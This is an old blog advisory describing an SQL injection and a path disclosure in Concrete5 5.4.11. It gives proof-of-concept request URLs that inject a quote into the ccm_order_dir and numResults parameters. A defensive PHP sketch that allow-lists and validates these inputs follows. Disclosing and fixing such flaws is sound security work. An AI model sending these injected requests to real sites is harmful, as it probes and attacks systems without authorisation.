Saturday, 19 November 2011
SQLi/Info Disclo in Concrete 5.4.11
Another old bug...
# --------------------------------------------------------------------------- #
# - Title : SQL Injection/Info Disclosure in Concrete 5.4.11
# - Tested on : Ubuntu
# - Date : 3o.o3.2o11
# - Download Link : sourceforge.net
# - Author : ;)
# - Greetz :
# --------------------------------------------------------------------------- #
1. Log in to CMS.
2. Go to:
http://localhost/concrete5.4.1.1/index.php/tools/required/files/search_results?&ccm_order_by=fDateAdded&ccm_order_dir='rap&searchInstance=file1301504000
3. That's it!
* Path disclosure is also here:
http://localhost/concrete5.4.1.1/index.php/tools/required/files/search_results?searchInstance=file1301504000&submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector=&fKeywords=aaa&numResults=%22&searchField=&selectedSearchField[]=&ccm-search-files=Search
# regards,
# .
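
A defensive sketch of how the three request values seen above (`ccm_order_by`, `ccm_order_dir`, `numResults`) can be constrained before they reach a query. This is an added example, not concrete5 code or the author's. The function names, table name, extra column names and the premise that the sort values end up in an `ORDER BY` clause are assumptions.

```php
<?php
// Added example: not concrete5 code. All function names are hypothetical.

// Sortable columns. Only fDateAdded comes from the advisory URL; the others are placeholders.
const ALLOWED_ORDER_BY = ['fDateAdded', 'exampleName', 'exampleSize'];
const MAX_RESULTS = 100;

// ORDER BY identifiers and keywords cannot be bound as query parameters,
// so map the request value onto a fixed set and fall back to a default.
function safeOrderBy($value): string
{
    return (is_string($value) && in_array($value, ALLOWED_ORDER_BY, true)) ? $value : 'fDateAdded';
}

function safeOrderDir($value): string
{
    return (is_string($value) && strtolower($value) === 'asc') ? 'ASC' : 'DESC';
}

// numResults must be a plain decimal integer; anything else gets the default
// instead of reaching code that raises an error showing the server path.
function safeNumResults($value, int $default = 10): int
{
    if (!is_string($value) || !ctype_digit($value)) {
        return $default;
    }
    return max(1, min((int) $value, MAX_RESULTS));
}

function buildFileSearchSql(array $query): string
{
    $by  = safeOrderBy($query['ccm_order_by'] ?? null);
    $dir = safeOrderDir($query['ccm_order_dir'] ?? null);
    $num = safeNumResults($query['numResults'] ?? null);
    // Table name is a placeholder; keyword filtering would use bound parameters.
    return "SELECT * FROM example_files ORDER BY {$by} {$dir} LIMIT {$num}";
}

// Constructed inputs mirroring the two requests in the advisory, plus a valid one.
$requests = [
    ['ccm_order_by' => 'fDateAdded', 'ccm_order_dir' => "'rap"],
    ['ccm_order_by' => '', 'ccm_order_dir' => '', 'numResults' => '"'],
    ['ccm_order_by' => 'fDateAdded', 'ccm_order_dir' => 'asc', 'numResults' => '25'],
];
foreach ($requests as $q) {
    echo buildFileSearchSql($q), PHP_EOL;
}
```

The first two inputs fall back to `ORDER BY fDateAdded DESC LIMIT 10`. Setting `display_errors = Off` in production also keeps file paths out of error output.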